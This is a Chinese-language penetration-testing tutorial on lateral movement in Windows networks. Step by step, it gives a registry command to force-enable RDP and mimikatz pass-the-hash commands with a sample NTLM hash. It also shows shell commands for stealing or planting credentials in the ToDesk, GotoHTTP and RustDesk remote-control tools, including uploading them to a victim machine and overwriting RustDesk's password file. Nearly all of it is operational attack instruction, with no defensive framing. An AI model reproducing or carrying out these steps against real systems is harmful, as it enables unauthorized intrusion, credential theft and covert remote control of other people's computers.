横向移动指的是攻击者在内部网络中获得初始访问权限之后，通过相关技术扩大敏感数据和高价值资产权限的行为。

横向移动的方式有如下几种：

1. 通过Web漏洞；
2. 通过远程桌面；
3. 通过账户密码；
4. 通过不安全的配置；
5. 通过系统漏洞；

利用远控工具横向

通过远程桌面横向

概述

远程桌面协议(RDP)是一个多通道(multi-channel)的协议，让使用者(所在计算机称为用户端或“本地计算机”)连上提供微软终端机服务的计算机(称为服务端或“远程计算机”)。

利用条件

• 开启了3389端口；
• 防火墙等安全设备允许通行；
• 网络必须相通；
• 有账户名和密码（或者HASH值）；

查询3389端口开放情况

netstat -ano

手动开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

注意：该命令需要高权限用户

查询远程桌面是否为3389端口

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber

连接RDP

1、通过密码抓取技术，如果可以抓取到明文的账户名和密码，则可以直接进行连接；

2、如果没有抓取到明文的账户名和密码，则需要通过HASH值进行连接；

privilege::debug
sekurlsa::pth /user:用户名 /domain:IP地址 /ntlm:Hash值 "/run:mstsc.exe /restrictedadmin"

通过cs等工具拿到计算机用户对应的hash值

2、使用mimikatz工具进行hash传递（最好使用server 2016进行）

privilege::debug

sekurlsa::pth /user:administrator /domain:192.168.110.10 /ntlm:db40247dab331ac57c207032f198f364 "/run:mstsc.exe /restrictedadmin"

输入目标的IP地址

通过Todesk横向

概述

ToDesk是一款类似向日葵的远程控制软件，但比向日葵、TV和AD更为流畅和稳定，它同样具备着内网穿透、文件传输、云端同步和流量加密等功能。
Todesk有绿色精简版和全功能版两个版本，支持的系统有：Winodws/Linux/MacOS/Android/iOS。

操作

shell type C:\"Program Files (x86)"\ToDesk\config.ini

通过GotoHTTP横向

概述

使用远程控制时，不必在每一台电脑上都安装远程软件。

不同于传统C2C模式的远程控制工具，GotoHTTP工作在B2C模式。使用远程控制时，您不必在每一台电脑上都安装远程软件。不管身处何处，有浏览器就能访问远程电脑。 即使公司网络管控，仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、语音通话、远程摄像头、多显示器支持 ......

官网网址：GotoHTTP - 在线远程控制平台

下载地址：GotoHTTP - 免费下载

操作

1、将GotoHTTP工具上传到目标机器

2、运行上传的工具

3、在同目录下会生成GotoHTTP的配置文件，文件里面有连接地址和账户密码

查看配置文件

4、在Web页面进行连接

通过RustDesk横向

概述

RustDesk 是一款可以平替 TeamViewer 的开源软件，旨在提供安全便捷的自建方案。

官网地址：https://rustdesk.com/zh/

下载地址：https://github.com/rustdesk/rustdesk/releases/latest或者https://gitee.com/rustdesk/rustdesk/releases

操作

1、上传程序到目标机器

2、运行程序

3、默认路径下的配置文件在C:\Users\用户名\AppData\Roaming\RustDesk\config

RustDesk.toml文件里面保存了连接ID和密码，读取该文件

shell type C:\Users\administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

密码为空

4、如果没有看到密码，则需要先将原RustDesk.toml文件下载，在password处添加6位数密码，再将文件进行上传

添加6位数密码，保存

再上传到原位置，进行覆盖

5、关闭RustDesk进程，再启动RustDesk程序

查询进程PID

shell tasklist

结束进程

shell taskkill /PID 332 /F

启动程序

再次查看RustDesk.toml文件

shell type C:\Users\administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

6、连接目标机器